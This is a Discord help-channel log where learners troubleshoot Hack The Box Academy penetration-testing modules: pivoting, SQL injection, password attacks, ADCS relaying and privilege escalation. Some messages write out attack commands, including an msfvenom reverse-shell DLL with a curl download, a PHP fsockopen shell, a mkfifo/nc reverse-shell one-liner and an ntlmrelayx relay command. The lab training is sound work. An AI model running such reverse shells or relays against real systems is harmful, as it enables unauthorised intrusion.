#modules

https://tenor.com/view/oh-hell-nah-no-no-thank-you-gif-5556407309512400852

Hello, I'm contacting you because I'm stuck on the SQL statement question in the fundamental SQL injection module, where I'm asked to find the department table, except that it isn't in any database (there are four databases, this one: MariaDB [(none)]> show databases;
+--------------------+
| Database |
+-------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
4 rows in set (0.000 sec)
Thank you for your help. Have a nice day/evening.

if I am attacking a target through a ligolo-ng tunnel, and I am using metasploit, what do I set as my LHOST?

Tables exist in databases

You'll need to use the create_listener function in ligolo to create a forward to your host

Ok I added this to my Ligolo session:
listener_add --addr 0.0.0.0:1234 (my pivot) --to 0.0.0.0:4444 (my parrot)

Then do I set my LPORT to 1234 or 4444?

let me ask you this: how do you expect the payload to return to you

my target is on 172.0.0.1. My pivot is on 172.0.0.2. My Parrot is on 10.10.14.1.

I need the payload that metasploit delivers to go to 172.0.0.2:1234 --> reverse shell to 10.10.14.1:4444

as a note for payloads like this it's kinda awkward; i generally dislike using metasploit through ligolo

if you can, use a manual payload instead of an automated one

anyone doing the Detecting Windows Attacks with Splunk modules i cant open the Splunk siem, im using EU server

here ?

yes; you'll have to use a database to see it's tables

i believe the module teaches you basic enumeration commands @nocturne geyser

the basics of any database tool
databases hold tables; tables hold data

Are u in this Module?

Hey there. I'm not entirely clear as to what to do here

can someone help me out?

thats what i did, thanks!

connect to the target and attempt to use plink.exe to pivot... it's really that simple; it's optional and not required so there's no actual flag to grab/recover

ye, figured it out, was just a bit confused, I thought I had to do it from a windows attack host I had to connect to from my machine

I mean I'd highly recommend setting up a Windows VM and trying it from there as well, it should also be possible. And a Windows VM will be useful

Oh, already done, I have one set up for reverse engineering and stuff, just used that

Sorry I was not aware of that. My bad

it's alright, it happens. most people don't look at channel descriptions

Hey guys, i need help with the bash scripting intro module. i don't know what's wrong with my skript and keep getting a bad decrypt error

It's the task where you have to encode var 28 times via a for loop and then run the decrypt function to get the flag

I added the for loop, and also used the number of characters in var as the salt variable

@fallow gazelle that module is above tier 0 so sharing info is against the rules :) (see channel desc.)

My bad

dm me your for-loop and variable assignment; i feel like I know where your issue may be (i don't need the whole code)

Dm'd thankyou, any help is appreciated

Hello I am currently new to ligolo and I am facing issues connecting to the target machine I guess because the certificate. I tried to see if ippsec uses ligolo but couldn't find any 🙁

this is the command issued from the attacker machine :
$ ligolo-proxy -selfcert

Hello everyone greetings please I'm not getting the protocol for the 5500 in the nmap -sC -sV -p5500 -Pn

On the coldfusion Discovery & eunumtion

Section of the attacking common applications

Module

由於缺乏長時的自然環境調查數據，野生二趾樹懶的平均壽命目前仍然未知

也称乱数假文或者哑元文本， 是印刷及排版领域所常用的虚拟文字

Yeah it worked 😄 Thanks

All scans are being filtered

Shells and Payloads module - Live Engagement section

Hi everyone, where can i find a browser in the foothold host?

Intro to AD rdp connection just fails

Check your Internet connection

try another client? i have more luck with remmina

will do thnx

hey guys
i cant open the Splunk siem while doing the Detecting Windows Attacks with Splunk modules, im using EU server

lol

well thats one way to eliminate xfreerdp

yea i cant even ping the target

oh now i could ping it

does nxc rdp work?

are you running the vpn twice?

no i just used ovpn --config on the downloaded vpn file

thats usually the cause of intermittent network issues

i would probs restart environment and failing that restart vm

this is the 6 target machine ive spun up

damn

i guess its the vpn issue the ping takes too much time to respond 240ms

maybe, depends where you are. i deal with more than that from australia and it generaly works pretty fine

i see ,k let me try different vpn

damn i overshadowed this .

mb

hi guys i am stuck at Intro to Whitebox Pentesting SA2 altough i patched the script but still getting code injection should not be possible, even without sanitization or validation even i removed the Function call to console.log.

EDIT : beside what i mentioned i moved the validation and sanitization inside of try block instead of the function and i got the flag

all g bro

On the Network Foundations on the last part Skill Assesments there is a step i have to do nc -v <target ip> <dynamic port> in the example on htb it says
(UNKNOWN) [10.129.233] 49704 (?) open
but when i use it i get (UNKNOWN) [10.129.233] 4970 (?) : Connection refused

I haven't done any of those modules, but I'd make sure you are using https and the correct port, as generally folks who have issues accessing the splunk search head usually don't try https. Hope that helps.

Can someone explain me how to select between web shell, bind shell or reverse shell and how to select the right one from the infinite list?

i dont think the brute force method is the best

Did you read through the sections that cover these and what their differences are?

thanks bro i just figured it out tho

https://academy.hackthebox.com/beta/module/81/section/787
I dont really understand wher Im supposed to find this file

Often if a file is provided, it can be found within Resources.

I don't see them, could it be because i'm in the beta version of htb ?

If a Resources button isn't present, that usually means there are no provided Resources. I haven't done that module, so I unfortunately don't have any other information. As for the beta version, not sure, but if you can switch versions, you could verify that information.

yeah i found them now, it's actually because the beta version doesn't have them yet. Thx

Awesome! Good to know, thanks.

https://academy.hackthebox.com/module/147/section/1335

For exploiting ESC8, using ntlmrelayx gave me this error, I have tried using new venv to downgrade the crypto version but other errors kept popping up. I'm curios on why certipy's relay function won't work on this one. Anybody has the solution for this?

I got problem spawn a server in a module, its like just refreshing, what can i do? :3

Hi,
I'm currently working on the LLM Output Attacks module as part of the AI Red Teamer track and reaching the assessment stage.

Could you please point me to the right place (channel, thread, or person) where I can ask for help or discuss the challenge during the assessment phase?

Hello, targets not spawning on EU academy

yep

Should I change the VPN server or is it like that everywhere?

hey folks

idk trying to spawn with us server

what is mean of that question ?

john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128

use /usr/share/wordlists/rockyou.txt

I know how can I crack

ping me if works

but where is hash 😄

which hash *

yes US 1 works fine

it will be prolly mentioned there

ty

can u make it more clear ? Please

what module is it?

Introduction to John The Ripper

193069ceb0461e1d40d216e32c79c704

yes

thats the hash

thats not RIPEMD-128

thats md2

ahh confusing

nah its ripe

btw do u know when i f.e. switch from US 2 to EU 2 back, do I have to change my ovpn file/redownload it?

near bottom of the page here

Read the paragraph underneath the example and it tells you what that hash type is, as the output shows numerous possibilities.

yeah but my question is do I need to redownload the vpn file after I switch back to EU academy 2, which I have used previously?

yes

thanks

yeyy I got the point

@candid bridge i would like to clear up some confusion about the last section of the 2nd module of cwes
https://academy.hackthebox.com/module/75/section/819
here when they say Program a simple web application
they mean you should make the website and test it yourself locally
you dont need to host it and push it to production or even share it with other people
thats why they ask you to do it in a VM in a safe environment

also about attacking the site you have to do it because in this context you are learning the hacks you have to attack it. you can only do so if its hosted locally cause you can just attack a hosted website it would go against the tos/policy of the website hoster(unless its bbh and under boundaries)
but yeah for now keep things local

What flag...

also, been at this for a while...just doesn't seem to work

You might need to use proxychains4 just all depends on what you have configured.

Got it, just did it with ligolo anyway, doesn't matter

also, still can't figure out what the flag is

nvm

I'm blind

Yeah some things are hidden in plain sight

just tried it with proxychains4, it worked, thank you!

This part of the module made me rethink everything I've done so far. I like HTB.

"It's a great idea, until you start putting in the work"

Anyone around for a poke on the priv esc on AEN MS01 host please. I have working routes, not sure if there are more?

Hello everyone 👋🏼 please can I get some assistance on the attacking common applications

https://academy.hackthebox.com/module/113/section/2154

On the Attacking Applications Connecting to Services

The gdb debug isn't working

It's saying cannot insert breakpoint 1 and cannot access memory at address 0x....

Please 🙏🏼 can someone help me out here 🙏🏼🙏🏼

The instructions may be in decimal instead of hex

I suggest rereading your notes on password attacks re: credential storage of different kinds

Also, in general, avoid asking for hints on AEN treat it like an exam

Not sure I'll do that, its good advice but not my style. I've completed it blind already

I shall do that, thanks

In decimal I don't think so cuz it shows up when I click run

The module itself is a walkthrough

Yeah. Thats the reason I'm asking, walkthrough doesn't mean thats the only route right? Why I asked anyway...

What i mean is: the module references the steps in decimal, not hex
Gdb may he operating in hex not decimal

So translating +10 in decimal -> hex is A or hex -> dex is 16

Yoo, im doing assessment 2 of brute forcing but my command is making an error, and I dont understand why

You need to attack the ftp server internally

I.e in the memory address should be in decimal

Correct I forget the exact way it is around. But I do remember it being a thing

sorry but what does that mean

The memory address 0x011bc

Connect to the ssh server running on that port, then use tools on that ssh server to attack ftp

That's the memory address

I dont recall all the specifics of that module tbh

I meant when you assign instructions like <start+10>

Oh like main+430

Yeah

wierdly I couldnt connect to ssh at first but now it works thx

Oh okay I'll try it thanks

im doing pass the hash in Password attacks, task 6 where I have to get a reverse shell

I get a call back but the shell does not fully connect

i've reset the machine 4 times and I get the same result

nc.exe : listening on [any] 8001 ...
    + CategoryInfo          : NotSpecified: (listening on [any] 8001 ...:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
dir
connect to [172.16.1.5] from (UNKNOWN) [172.16.1.10] 49759
dir
dir

I changed port number, shell type

the machine just hangs

Looks like your payload may be incorrect if youre getting that error. Should be able to follow the module instructions and use the payload specified by the module

it's the same one as the module

wow nvm it's working now

I changed the port to 443

is there a way to turn off windows defender without admin rights

Not really, sans some special permissions. Best to just say which module/section/question you're on, you could be going down a rabbithole.

hello guys im new here. I'v been working on Fawn module I was at Task 7 , The answer must be ftp -h but it says incorrect task flag what do i do ? ty

That's not a module, that's a Starting Point machine. #starting-point

Hello There. Can anyone tell me where to download the pcap in the module "Guided Lab: Traffic Analysis Workflow"?

and see the pinned messages for the answer in that channel

sorry sir ty for that

Anyone?

Hello all. I'm working on the brute force - web services module with medusa. In this lesson we are asked to find a password (that I have) then login in the ssh server of the distant machine and check around one or 2 things. The problem : whatever i do i get a permission denied (publickey) on every thing I tried. What I m doing wrong here ?

@weary crow module is above tier 0, avoid spoiling

Specify the port with -p

By default it attempts to connect to port 22, which is locked down on public containers

I just found -p 5 seconds ago

😢

the always true "I'm stupid or what ??" ...

I used -P ...

Linux is case sensitive

-p and -P are different switches

yeah I have no idea why I typed that

Oh I'm so sorry that I didn't know

I just did this lab as well, couldnt get the UAC bypass to work for the elevated shell, tried to reset the box, tried signout/signin on the RDP, doesn't seem to work the way its supposed to. Has anyone got this to work recently? if so, DM me
For reference: https://academy.hackthebox.com/module/67/section/626

kali: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.132 LPORT=8443 -f dll > srrstr.dll
kali: nc -lvnp 8443
kali: python3 -m http.server 8081
PS: curl http://10.10.14.132:8081/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"
cmd: tasklist /svc | findstr "SystemPropertiesAdvanced"
# output is Empty
cmd C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

# No activity on the nc listener, also tried exploit/multi/handler with the above settings

completed another section of CDSA gonna do another today

Looking for help on Attacking AI - Application and System - Model Deployment Tampering

Can't figure out walkthrough for challenge "Exploit the ShellTorch vulnerability to obtain the flag. " copying and pasting does not pop the payload.

On the getting started module - privilege escalation section is it not possible to load linPEAS on remote host via python http server? Is there a firewall in place ?

what error are you getting

What could be the problem, I'm going through this module(https://academy.hackthebox.com/module/147/section/1327 ) about Password Attack, I got to Network Services, but for some reason the utility from the module just refuses to work, I have already tried both pwnbox and connecting from my PC via the vpn config, nothing changes.The command just doesn't give anything away. I thought the host might be unavailable, but the ping reaches it.

The files from the archive are username.list and password.list, and you are using user.list and pass.list, are they correct?

yes, I just copied the data from the files to pwnbox via the clipboard and named the files that way. But I also tried with the original archive on my virtual machine, the result is the same.

Seems to be working

Make sure you are not connected twice to the VPN, e.g., having a VM connected to the VPN and at the same time having the workstation on

I'm trying with pwnbox, isn't it connected by default? And i can ping host, I think its on

It is, what I mean is not be connected to the VPN in your local VM at the same time

Anyone can help me for File Upload Skill Assessments how do i intercept the post request made by the ajax scripts? i cant get it around

Try another route, perhaps the ajax scripts one is not the one you need to focus on

And the problem was really in two connections... Thank you

Anyone can help me with these? https://academy.hackthebox.com/module/147/section/1356

• Point: Credential Hunting in Network Shares
• Point: Pass the Certificate
• Point: Skill Assesment - Password Attacks

https://academy.hackthebox.com/module/33/section/518
-Point: Skill Assesment - SQL Injection Fundamentals

https://academy.hackthebox.com/module/23/section/513
-Point: Skills Assessment - File Inclusion

Hello

can anyone help with
https://academy.hackthebox.com/module/296/section/3394

Pentest in a Nutshell module

For the Q1 in Credential Hunting in Network Shares use a PowerShell cmdlet to recursively grep for the domain name without the TLD

since it's tier 0, can I share my screen in one of the voice channels?

I've been stuck on this for 2 days, it's getting frustrating

On which question are you stuck?

all of the Linux Target sections questions, the target instance is showing and I can scan it using nmap, but I can't find the wordpress website to scan it

The first question directs you to an FTP service, did you try to access it?

yes

Okay, then you should have found something

What is the name of the theme used by WordPress on this target?

[i] The main theme could not be detected.

wpscan returned that

and when trying to figure out the theme manually

What about manually finding the theme?

or using wappalize

wappalizer*

In which directory usually the themes are stored?

If it is not HTTP what about HTTPS

https://tenor.com/view/shy-dog-dog-shy-dog-shoes-martian-shy-gif-1847379792495616229

@hybrid stone thank you!

Hello to all . Has anyone completed the android fundamentals module ? I have a problem in final question2 . i use the command: adb shell ls -l /data/data/com.android.settings and i get the following

i try as an answer 1000 but it is wrong . Can anyone help ? thanx in advance

Module: Active Directory Enumeration & Attacks

Section: Kerberoasting - from Linux

The login cred for the user forend is all the way back in the Section: Credentialed Enumeration - from Linux

Why aren’t the user:creds not mentioned right before the lab within Kerberoasting

Or is there another intended way of finding the user:pass ?

Anyone can help me solve?? Pm me https://academy.hackthebox.com/module/147/section/1356

• Point: Credential Hunting in Network Shares
• Point: Pass the Certificate
• Point: Skill Assesment - Password Attacks

https://academy.hackthebox.com/module/23/section/513
-Point: Skills Assessment - File Inclusion

Were you able to figure this out? I'm trying to solve the question using only WiNRM (except RDP to SRV01) but cant get around the double hop problem either

On which questions do you need help with as both Credential Hunting in Network Shares and the Pass the Certificate sections have two questions each

Hi everyone, the foothold host in the Shells and Payloads lab is an internal compromised host or the cat5 pc that as access to the foothold host?

The first

Not exactly sure what you are asking, but the image that shows Target Hosts might help you understand the topology.

I search the smb share with keyword passw, but no one pass works in first wuestion lol

how is it possible without a shared shell? And how is it possible there are all the tools i need already installed?

The first. I search all smb shares for passw and nothing worked

Foothold host is an internal compromised host or a cat5 pc that has a shared shell with with foothold host?

It is a provided foothold, via login credentials, so what type of host do you normally have when you can login this way?

dont understand the question

Likewise, I don't understand what you are confused about. Did you access the foothold as per the Connection Instructions?

when u compromise an host, you estabilish a shell session, but here i see a foothold host without a shell session and with all the tools installed, how is it possible?

A shell session isn't what you get every time you compromise a host, but this isn't the time for that. This scenario is unique in that you are provided access to a host within the network, call it an Assumed Breach if you will and yes the host does have all the tools you need to perform your tasks. If you had already done the pivoting module, it is possible, this would not be the scenario. Regardless, what issue are you having with your foothold?

Pass The Certificate

https://academy.hackthebox.com/module/147/section/1335

Question: What are the contents of flag.txt on jpinkman's desktop?

Anyone can help here?

Curiosity only

Can legitimately follow along with the section.

Hi, I've discovered Administrator credentials in a Windows lab environment that appear to be improperly stored/exposed. Where should I report this security issue?

OK. I am trying to understand.
I took a few months break off from doing the CPTS and now pretty much everything to do with bloodhound does not match the course. As I'm using the latest Kali edition it seems the CE edition is being pushed over whatever was being used before. However it seems that many attributes are not being collected by the collector and/or not being enumerated by the graphing part of bloodhound.

Case in point to illustrate is the "Checking the Domain Users Group's Local Admin & Execution Rights using BloodHound"

The module shows this under "exectuion rights". Whereas a screenshot of the CE edition as run by me shows 0 items. So what to do? I'm not a big fan of randomly gitcloning stuff so what setup should I be using or should I be looking to downgrade my Kali install to one that's about 1 - 2 years old? Is there a sticky topic that I am missing? Is there maybe a transposition table for equivalent labels/commands between the versions?

Note: running the saved query in the CE edition "Workstations where Domain Users can RDP" yields 0 results.... So something is going wrong somewhere. For the collection I used the SharpHound executable in the c:\tools dir on the victim machine. On second thoughts I uploaded the latest ingestor (found here: https://github.com/SpecterOps/SharpHound/releases/tag/v2.8.0) ran this reloaded and tried again but the result is the same. So what gives?

Hi, I am in desperate need of a hint.
in what seems to be a simple SSRF exercise I am completely stuck.
Module Server-Side attacks section Exploiting SSRF, there's supposed to be hidden directory, I tried fuzzing with like 5 wordlists and found absoloutely nothing, I also tried fuzzing for open ports but only found 3306 mysql port open, which I tried using gopherus on but it was useless.
please someone guide me, in the whole CWES path I have never been stuck on something so seemingly trivial

Is there anyone for the Web Attacks Module. Specifically the Section Advanced File Disclosure. I am confused why i can't read source-code like /var/www/html/submitDetails.php or /etc/passwd.

Files i was able to read were /etc/hosts and /flag.php

Noticed this also only happens with the CDATA or Errorbased Approach. With php filter i can /var/www/html/submitDetails.php

for the knowledge check for getting started i cannot seem to get a shell in any type of way. i am using a PHP reverse shell(execshell). do i have to add <php? in front of the php file for it to work? here is my shell:
||php -r '$sock=fsockopen("ip",9004);exec("sh <&3 >&3 2>&3");'|| i dont get anything on my nc listener. also is the website supposed to be this slow i have to wait around 15 seconds every time i click something?

hello

im on the attacking comon services module, in the FTP section

i'm running the lab but i can't establish a connection to the services (i tried the port ||2121|| which was previously responding to nc but isn't now).

idk if there are any problem with the labs or is only in my case

thanks in advance

Please refrain from posting content above Tier 0. I recommend using the search function as this has been asked quite a bit.

Nope, that wasn't your post.

I can't find anyone with similar symptoms when I search, so I'd like to ask a question. Is there a place where I can ask questions at Tier 0 or above?

Read the pinned messages and you can read how you can ask questions.

Hey, i have an issues for the module : RDP and SOCKS Tunneling with SocksOverRDP

https://academy.hackthebox.com/beta/module/158/section/1439

I have to download the SocksOverRDP x64 Binaries, then upload to my target windows and unzip it.

But when i unzip it, the .dll is automatically deleted. I don't know why.
Someone could help me ? thx

I’m on the password attacks spraying,stuffing, and defaults and i have found the creds on the database but struggling on the submission format, can you help?

I am currently trying to use || ntlmrelayx || to listen for inbound connections and relay them to the web enrollment service. I am attempting to use the printerbug.py to force the dc01 to authenticate against my machine to be relayed to the certificate authority.
|| I try this :sudo impacket-ntlmrelayx -t http://10.129.111.51/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication ||
but its always time out
was I wrong?

NVM, i got it!

Hey you can DM your inputs and output from your commands.

anyone who managed to solve the sql injection fundamentals skill assessment?

I am not able to bypass the login page

Hi everyone, does HTB Academy assume that we already know many programming languages and shell environments? Because I often see lines of code mentioned as if the syntax is taken for granted.

----SOLVED----

Hey!

Im currently working on the Knowledge check of the Pen tester job role path, getting started module (The website with the outdated GetSimple).

I am done with submitting the user.txt, my next task would be obtaining the root.txt flag.

I have ran into a little issue with privilige escalation.
||
I have ran LinEnum.sh, and I have received an output about a possible sudo pwnage

[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

[+] Possible sudo pwnage!
/usr/bin/php

So, as I have learnt it in an earlier task, I have tried running the following command to obtain root access

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.21 8443 >/tmp/f' | tee -a php

My problem comes here. Upon running this, I get the following output:

<h -i 2>&1|nc 10.10.16.21 8443 >/tmp/f' | tee -a php
tee: php: Permission denied
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.21 8443 >/tmp/f

I don't have access to use tee on php. What am I missing? I'm trying but I really can't find a way to get through this.||

----SOLVED----

I completed yet another section of CDSA today.

🎉

in ten minutes will do one more section I think this is going well

@pliant fossil while the module is tier 0; try not to reveal direct steps for solving the skill assessment (knowledge check) of the module, this includes things you had to discover and exploit yourself

Sorry, and thank you for the reminder.

in the future, spoiler tags don't really do anything, but iirc they don't show up in the search feature. But if you have enough info not spoiled...well people can easily find it. Again it's tier 0 so you didn't do anything wrong, and congrats for getting through it!

Hello please can someone help me

I'm at the skills assessment

Of attacking common applications

(i) I get the connection but it's not displaying back

there's 3 skill assessments

Yeah

I'm at the first one

I have a connection but it is not working

Please can I get some help on it

so you're at the last question?

Yeah I am

i'm assuming you're using msfconsole and set the target URI properly alongside the RHOST, LHOST, and LPORT options

I'm really lost here

I'm using the py script

either that or return to the reading regarding THE APPLICATION and VERSION in use

Okay

The Server is not outputting anything

It's just not responding

I proxied it and it wasn't responding

Could I get a sanity check on the NoSQLi Injection skills assessment 2 for the Senior Web Penetration Tester path?

Anyone able to give me hint on the knowledge check from the getting started module, stuck at the reverse shell part

i used msfconsole on this one but i'm sure you could find other ways to exploit the vulnerability on this server. But as far as 'using the py script' i'm kinda lost there because there's a couple sections that may be relevant to look at not just one

I get it now

"Hey everyone, I'm stuck on the 'Information Gathering - Web Edition' module, in the 'Creepy Crawlies' section.

I'm running the required command python3 ReconSpider.py http://inlanefreight.com, but I keep getting a No route to host error.

I don't know what to do. I've already tried switching VPN servers and I even tried using the Pwnbox, but I get the exact same error. What could be causing this and how can I fix it?"

no route to host sounds like an issue on your end; also try www.inlanefreight.com

actually just checked both http and https should work alongside inlanefreight.com and www.inlanefreight.com

Module: Attack Common Application
section: Exploiting Web Vulnerabilities in Thick-Client Applications

I'm stuck here for the 2nd day 😪

use 0xdf's writup for 'fatty' or ippsec's video on 'fatty' as that's what this is directly based from

Thank's I'll 🏃💨

Hi team, I'm having trouble with the "Creepy Crawlies" section of the "Information Gathering - Web Edition" module.

The target machine, inlanefreight.com (10.129.27.33), appears to be offline.

When I run the ReconSpider.py script, it fails with a No route to host error. I've also tried to ping the machine, and it fails with Destination Host Unreachable and 100% packet loss.

To make sure it wasn't my connection, I have already tried:

• Using the Pwnbox (it also fails to ping the target).
• Connecting from my Kali machine.
• Changing my VPN server/region (tried both EU and US).

Since it's unreachable from both the Pwnbox and the VPN, it seems the target machine is down. Could someone please check on it or give it a reset?

Thank you!

there is no 'target machine' it's a live (fake) website

if you have 'no route to host' did you mess with the /etc/hosts file?

"No, I haven't touched my /etc/hosts file. My ping resolves the correct IP (10.129.27.33), but it fails with Destination Host Unreachable.

The key proof is: I tested on the Pwnbox, and the Pwnbox gets the exact same 100% packet loss. The target seems to be unreachable from everywhere."

Hey, old message but I'm currently stuck on this. If you still remember, how did you get around this?

inlanefreight.com isn't a 10.129.x.x target 🙃

try

python3 ReconSpider.py https://inlanefreight.com
@kind lance

getting started module - priv escalation page
got a connection timeout error when i was trying to load linpeas.sh

as per my understanding there could be a firewall in place which doesnt allow to download files from host machine

i did a base64 encode and decode but looks like no permissions to run it

it's a public ip; so it won't be able to connect to your machine

umm i gave the tun0 ip ?

linpeas is gonna output a bunch of stuff that may or may not be useful. I suggest manually looking around

this host is on a public_ip:port no?

it's been a min

chmod +x ./linpeas.sh ? @jovial walrus

yeah i forgot to do that 😁 ..had to take some chatgpt help to figure that out😭

Linux Fundamentals Module, Filter Contents section
Could someone give me a hint as to what commands i need to be looking into

i tried using something like || grep -E "(http://|https://)" | sort -u | uniq | wc -l || which didn't seem to work

Edit: Ok i think i got smth better but it's not quite there yet, not sure how to separate the directories from files

Hey @fathom pendant, I just wanted to say thank you! Your tip that "inlanefreight.com isn't a 10.129.x.x target" was the clue that solved the entire mystery.

It turns out my /etc/hosts file had an old line from a different HTB lab, forcing inlanefreight.com to the dead IP 10.129.27.33. That's why I (and even the Pwnbox, when I tested it) was getting a No route to host error.

After your message, I disconnected the VPN, commented out that wrong line, got the real public IP (134.209.24.248), and then added the correct IP to my /etc/hosts for both inlanefreight.com and www.inlanefreight.com (to fix the 301 redirect).

The script ran perfectly after that. I never would have figured it out without your tip. Thanks again!

Its verte hard
I did it but its not easy

Review all the section and do all steps and You can resolve the lab

I simply did not use any port scanner, I just looked at what port the machine I was on used for the services and used the same ones to move laterally

Hey yall I have some questions, so I’m using hack the box and the first lesson is about testing the network and it is having me access the ip for the vpn so my questions is 1. How do I know/figure out what vpn the target is using and is there any commands for it and 2. Does the vpn have specific ips that they have for the entire vpn or are they each different like im thinking and 3. If they are different how do I find that ip

how to approach this nimbles box? shall I try to get the flag myself and read through the contents on each page?

When you click "Spawn target" it'll show you the IP of that box.
You either need to be connected through openvpn on your own VM instance, or you can use the pwnbox.
That way, both the target and "your" VM will be on the same subnet and able to talk to each other. @jovial walrus

oh thx I was just wondering if I should do the task myself or read though everyone on that page ..but I decided to get the flag and then read what is there

The modules teach you - and the target is where you practice / apply those techniques.

Can I PM you for a bit more help/guidance?

Hi, Did the module SQL Injection Fundamentals got any updates? the final skill assessment is totally different than before

I completed it, but some questions are unanswered and after spawing the lab. its total another web app

Yes

yes, it got updated

Module: Documenting & Reporting

Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)

What i tried;

• [Ctrl] + [b] + [%]
• [Ctrl] + [b] + [Shift] + [5]
• Ctrl + b + Shift + 5

it doesn't work, anyone know why?

Thanks, i get the question 🙂

Does anyone know this error? from web fuzzing module of Virtual Host and Subdomain Fuzzing

Command I used: gobuster dns -d inlanefreight.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Error: Incorrect Usage: invalid value "inlanefreight.com" for flag -d: parse error

Anyone getting 500 error on accessing Academy 2.0 beta ?

Over time command options can change so you can just run gobuster dns -h to see what the new option for specifying the domain is

hey folks

I changed my browser to firefox now vnc(pwnbox) is not accept clipboard from my host

did anyone got this problem ?

https://tenor.com/view/tea-time-yoga-calm-breathe-in-breathe-out-gif-14346803

did you use academy 2.0?

i have also same problem when using academy 2.0 so i switch back to the original

my problem about vnc not exactly from version of academy I guess

I am also on 1.0 version

Check the permissions in your browser, sometimes rejecting a certain permission could affect the clipboard

No one use firefox ?

@grand sphinx

sillly question - but for the AI Red team job path - in the Applications of AI In Infosec - do you need to download and install conda and jupyter notebooks every time you spawn a pwnbox? I'm on the Spam classification section and it appears neither are installed by default

Once your workstation is terminated it looses the installed/downloaded tools/files

hello, i want to ask any body have problem in submitting flag in phishing section in xss module ?

I see your flag submissions, you are most likely copying spaces

Could anyone help me for a module Im stuck at 😭

In Linux Fundimentals - Task Scheduling
It's asking me to find a type for the task dconf.service
Well I used systemctl, as mentioned in the descriptions above, and can't find any types.

What did I do wrong? Im so stuck here for a week or so.

its worrk, thank you

Hello please can someone help me with the exploiting thick clients vulnerability I'm trying to compile the invoke.java but the src code giving me 62 error in src code bother the edit src and the normal one

HTB Assistance Needed: Path = AI Red Teamer; Module = Applications of AI in InfoSec; Section = The Malware Dataset.
Issue = After installing conda and the python ai environment, and Jupyter, there is not enough space available in the VM to unzip the malimg.zip file (it is entirely likely I did something wrong).
Issue Summary:
Working on HTB Malimg module in Pwnbox. Need to download and process malimg_paper_dataset_imgs, but every attempt fails with “No space left on device.”

Tried:
Installed Miniconda, created ai env, Jupyter works.
Downloaded from ETH Zurich (404), GitHub, and Kaggle (1.1 GB ZIP).
Downloads stop at ~3%, unzip fails.
Cleaned caches, removed conda pkgs/envs, still 90%+ disk use (df -h shows ~1–3 GB free).
Confirmed it’s not a network or permission issue.

Current:
Environment OK, but dataset too large for Pwnbox (needs >5 GB free).

Need:
Clarify if storage quota can be increased,
Or if module must be run locally / with smaller dataset.

did the ability to extend target lifetime disappear? i only have the ability to refresh it

Could anyone give a nudge for the last question on Windows Lateral Movement Skills assessment.
What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt?

I have the VNC password, creds for ||arturo, dahlia and rossy|| as well as the NT hash for ||naomy||. I have a reverse shell on BACKUP and RDP to WSUS.

Really do not see the path from here. I'm guessing VNC but no luck there. RDP to BACKUP somehow?

Hello everyone 👋🏼

yo guys

ah yes, one message

im on file inclusion module
on log poisoning section
in the LFI vulnerability, im trying to read /var/log/apache2/access.log, which reads fine
im also able to inject text in the file by changing user-agent header
however, when i inject a php webshell, the file dosent output anything (either by including it or by trying to execute commands by &cmd=)
welp

For these they are not part of the usual infrastructure from HTB so they can only permit the default time alive. So that is by design in this case, other targets with 10.X.x.x ips allow for extension though

You are on the right lines with VNC. Give it another go but think internally... if that helps

Sorry meant to @ you

Thank you! Yeah I kind of figured I might need to run it locally. But need RDP to BACKUP for that?

I presume you have a meter meterpreter session from the earlier flag, if not you might struggle from there

hm... nope. Have normal revshell as SYSTEM....

Okay that's not end of world just a slightly different route, consider a port forward to the system youre on and then you should be able to VNC over proxy

On phone so cant do much more than this, hope you crack it soon!

Thank you so much! Will give it a try. Just resetting the lab, ran out of time extension 😛

is firefox supported by HTB for pwnbox officialy ?

make it true on about:config

still need gelp

im trying to download the third file. the open vpn, how do i do that?

Do you want to use the ovpn file or actually download it. Like using get?

Currently working on CPTS Password Attacks Skills assessment. I just completed it and was redoing it to make sure I understood everything. Could a moderator please DM, I have encountered an issue and don't want to post any spoilers

idek what i want, im lowk a noob bro. all im tryna do is like get the vpn to allow me ping ip's and capture the flags

If you want to connect to the vpn (the vpn is already on your system it seems) use sudo openvpn path/file.ovpn

it says command not found\

sudo apt install openvpn

okay im pretty sure i downloaded the vpn

but i still cant ping the htb ctf

now run: sudo openvpn <openvpnfile>

Bumping

mods aren't staff; so we can't just resolve issues

It's more of a general question

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

you can just ask for anyone that's solved the assessment instead of limiting your request to a mod

Today, when I ran the initial mimi command, it showed (null) for user s**m. I can't figure out why. I have tried everything, was able to get their ticket/hash's, login using a PTH attack, but it still shows (null) for their password

Just realized adding asterisks to obfusacate the user's names messed up my formatting

that's discord

also you did still reveal a lot of info for the assessment (specifically the file format)

Sorry, not trying to spoil or break terms

i mean you could have edited it instead of deleting

But the issue remains the same.

are you saying it gave you the plaintext pw instead of just the hash?

correct

I was able to use that pw to compromise the DC and dump the admin's hash

there could be a multitude of reasons as to why that happened, that's not necessarily a bug

do a UDP scan

helppp

i would generally say reach out to support or submit an #1234357888114364508 if you believe it to be an issue with the module

taking so long after 3 mins shows 0%

try T -4

specifically scan port 53, don't do a full -p- scan with UDP

-T 4*

did that only

yes, sorry

do what cowboy suggested and add -T 4 to the scan, see if that speeds anything up

also that module is above tier 0; so don't spoil things like commands

ok sry

taking so long what to do

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-30 01:55 IST
